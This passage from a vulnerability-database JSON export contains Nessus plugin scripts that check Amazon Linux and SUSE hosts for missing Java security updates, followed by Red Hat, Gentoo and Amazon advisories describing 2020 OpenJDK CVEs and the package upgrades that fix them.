script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-accessibility\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-accessibility-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-demo-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-devel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-headless-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc-zip-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-src-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\npkgs = [\n {'reference':'java-1.8.0-openjdk-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-accessibility-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-accessibility-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-accessibility-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-accessibility-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 
'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-accessibility-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-accessibility-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-demo-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-demo-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-demo-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-demo-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-demo-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-demo-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-devel-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-devel-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-devel-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-devel-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-devel-debug-1.8.0.272.b10-1.amzn2.0.1', 
'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-devel-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-headless-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-headless-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-headless-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-headless-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-headless-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-headless-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-javadoc-1.8.0.272.b10-1.amzn2.0.1', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-javadoc-debug-1.8.0.272.b10-1.amzn2.0.1', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-javadoc-zip-1.8.0.272.b10-1.amzn2.0.1', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-javadoc-zip-debug-1.8.0.272.b10-1.amzn2.0.1', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-src-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-src-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-src-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-src-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-src-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'java-1.8.0-openjdk-src-debug-1.8.0.272.b10-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n allowmaj = NULL;\n if 
(!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.8.0-openjdk / java-1.8.0-openjdk-accessibility / java-1.8.0-openjdk-accessibility-debug / etc\");\n}", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-14T06:30:46", "description": "This update for java-1_8_0-ibm fixes the following issues :\n\nUpdate to Java 8.0 Service Refresh 6 Fix Pack 20\n[bsc#1180063,bsc#1177943] CVE-2020-14792 CVE-2020-14797 CVE-2020-14781\nCVE-2020-14779 CVE-2020-14798 CVE-2020-14796 CVE-2020-14803\n\n - Class libraries :\n\n - SOCKETADAPTOR$SOCKETINPUTSTREAM.READ is blocking for\n more time that the set timeout\n\n - Z/OS specific C function send_file is changing the file\n pointer position\n\n - Java Virtual Machine :\n\n - Crash on iterate java stack\n\n - Java process hang on SIGTERM\n\n - JIT Compiler :\n\n - JMS performance regression from JDK8 SR5 FP40 TO FP41\n\n - Class Libraries :\n\n - z15 high utilization following Z/VM and Linux migration\n from z14 To z15\n\n - Java Virtual Machine :\n\n - Assertion failed when trying 
to write a class file\n\n - Assertion failure at modronapi.cpp\n\n - Improve the performance of defining and finding classes\n\n - JIT Compiler :\n\n - An assert in ppcbinaryencoding.cpp may trigger when\n running with traps disabled on power\n\n - AOT field offset off by n bytes\n\n - Segmentation fault in jit module on ibm z platform\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 3, "cvss3": {"score": 4.2, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N"}, "published": "2021-01-06T00:00:00", "title": "SUSE SLES12 Security Update : java-1_8_0-ibm (SUSE-SU-2021:0032-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14803", "CVE-2020-14792", "CVE-2020-14781", "CVE-2020-14798", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-14796"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:java-1_8_0-ibm-devel", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:java-1_8_0-ibm", "p-cpe:/a:novell:suse_linux:java-1_8_0-ibm-plugin", "p-cpe:/a:novell:suse_linux:java-1_8_0-ibm-alsa"], "id": "SUSE_SU-2021-0032-1.NASL", "href": "https://www.tenable.com/plugins/nessus/144761", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2021:0032-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(144761);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2020-14779\", \"CVE-2020-14781\", \"CVE-2020-14792\", \"CVE-2020-14796\", \"CVE-2020-14797\", \"CVE-2020-14798\", \"CVE-2020-14803\");\n\n script_name(english:\"SUSE SLES12 Security Update : java-1_8_0-ibm 
(SUSE-SU-2021:0032-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for java-1_8_0-ibm fixes the following issues :\n\nUpdate to Java 8.0 Service Refresh 6 Fix Pack 20\n[bsc#1180063,bsc#1177943] CVE-2020-14792 CVE-2020-14797 CVE-2020-14781\nCVE-2020-14779 CVE-2020-14798 CVE-2020-14796 CVE-2020-14803\n\n - Class libraries :\n\n - SOCKETADAPTOR$SOCKETINPUTSTREAM.READ is blocking for\n more time that the set timeout\n\n - Z/OS specific C function send_file is changing the file\n pointer position\n\n - Java Virtual Machine :\n\n - Crash on iterate java stack\n\n - Java process hang on SIGTERM\n\n - JIT Compiler :\n\n - JMS performance regression from JDK8 SR5 FP40 TO FP41\n\n - Class Libraries :\n\n - z15 high utilization following Z/VM and Linux migration\n from z14 To z15\n\n - Java Virtual Machine :\n\n - Assertion failed when trying to write a class file\n\n - Assertion failure at modronapi.cpp\n\n - Improve the performance of defining and finding classes\n\n - JIT Compiler :\n\n - An assert in ppcbinaryencoding.cpp may trigger when\n running with traps disabled on power\n\n - AOT field offset off by n bytes\n\n - Segmentation fault in jit module on ibm z platform\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1177943\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1180063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-14779/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-14781/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-14792/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-14796/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-14797/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-14798/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-14803/\"\n );\n # https://www.suse.com/support/update/announcement/2021/suse-su-20210032-1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?24a45f64\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud Crowbar 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-9-2021-32=1\n\nSUSE OpenStack Cloud Crowbar 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-8-2021-32=1\n\nSUSE OpenStack Cloud 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-9-2021-32=1\n\nSUSE OpenStack Cloud 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-8-2021-32=1\n\nSUSE OpenStack 
Cloud 7 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-7-2021-32=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP5-2021-32=1\n\nSUSE Linux Enterprise Server for SAP 12-SP4 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP4-2021-32=1\n\nSUSE Linux Enterprise Server for SAP 12-SP3 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP3-2021-32=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP2-2021-32=1\n\nSUSE Linux Enterprise Server 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP5-2021-32=1\n\nSUSE Linux Enterprise Server 12-SP4-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP4-LTSS-2021-32=1\n\nSUSE Linux Enterprise Server 12-SP3-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-2021-32=1\n\nSUSE Linux Enterprise Server 12-SP3-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-BCL-2021-32=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-2021-32=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2021-32=1\n\nSUSE Enterprise Storage 5 :\n\nzypper in -t patch SUSE-Storage-5-2021-32=1\n\nHPE Helion Openstack 8 :\n\nzypper in -t patch HPE-Helion-OpenStack-8-2021-32=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14792\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-ibm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-ibm-alsa\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-ibm-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-ibm-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3|4|5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4/5\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", cpu:\"x86_64\", reference:\"java-1_8_0-ibm-alsa-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", cpu:\"x86_64\", reference:\"java-1_8_0-ibm-plugin-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"java-1_8_0-ibm-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"java-1_8_0-ibm-devel-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"java-1_8_0-ibm-alsa-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"java-1_8_0-ibm-plugin-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"java-1_8_0-ibm-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"java-1_8_0-ibm-devel-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"java-1_8_0-ibm-alsa-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"java-1_8_0-ibm-plugin-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"java-1_8_0-ibm-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", 
reference:\"java-1_8_0-ibm-devel-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", cpu:\"x86_64\", reference:\"java-1_8_0-ibm-alsa-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", cpu:\"x86_64\", reference:\"java-1_8_0-ibm-plugin-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"java-1_8_0-ibm-1.8.0_sr6.20-30.78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"java-1_8_0-ibm-devel-1.8.0_sr6.20-30.78.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_8_0-ibm\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}], "redhat": [{"lastseen": "2021-02-16T08:31:44", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14779", "CVE-2020-14796", "CVE-2020-14797"], "description": "IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.\n\nThis update upgrades IBM Java SE 8 to version 8 SR6-FP20.\n\nSecurity Fix(es):\n\n* OpenJDK: Incomplete check for invalid characters in URI to path conversion (Libraries, 8242685) (CVE-2020-14797)\n\n* OpenJDK: High memory usage during deserialization of Proxy class with many interfaces (Serialization, 8236862) (CVE-2020-14779)\n\n* OpenJDK: Missing permission check in path to URI conversion (Libraries, 8242680) (CVE-2020-14796)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-02-16T12:33:49", "published": "2021-02-16T12:30:57", "id": "RHSA-2021:0530", "href": "https://access.redhat.com/errata/RHSA-2021:0530", "type": "redhat", "title": "(RHSA-2021:0530) 
Moderate: java-1.8.0-ibm security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2021-01-25T03:50:36", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14803", "CVE-2020-14782", "CVE-2020-14792", "CVE-2020-2590", "CVE-2020-14781", "CVE-2020-2604", "CVE-2020-2583", "CVE-2020-14798", "CVE-2020-14779", "CVE-2020-2601", "CVE-2020-14797", "CVE-2020-2659", "CVE-2020-2593", "CVE-2020-14796", "CVE-2020-2654"], "description": "### Background\n\nOpenJDK is a free and open-source implementation of the Java Platform, Standard Edition. \n\n### Description\n\nMultiple vulnerabilities have been discovered in OpenJDK. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nPlease review the referenced CVE identifiers for details.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll OpenJDK users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-java/openjdk-8.272_p10\"\n \n\nAll OpenJDK (binary) users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-java/openjdk-bin-8.272_p10\"\n \n\nAll OpenJDK JRE (binary) users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-java/openjdk-jre-bin-8.272_p10\"", "edition": 1, "modified": "2021-01-25T00:00:00", "published": "2021-01-25T00:00:00", "id": "GLSA-202101-19", "href": "https://security.gentoo.org/glsa/202101-19", "title": "OpenJDK: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2021-01-15T01:27:10", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14803", "CVE-2020-14782", "CVE-2020-14792", "CVE-2020-14781", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-14796"], "description": "**Issue Overview:**\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle 
Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). ([CVE-2020-14779 __](<https://access.redhat.com/security/cve/CVE-2020-14779>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JNDI). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). 
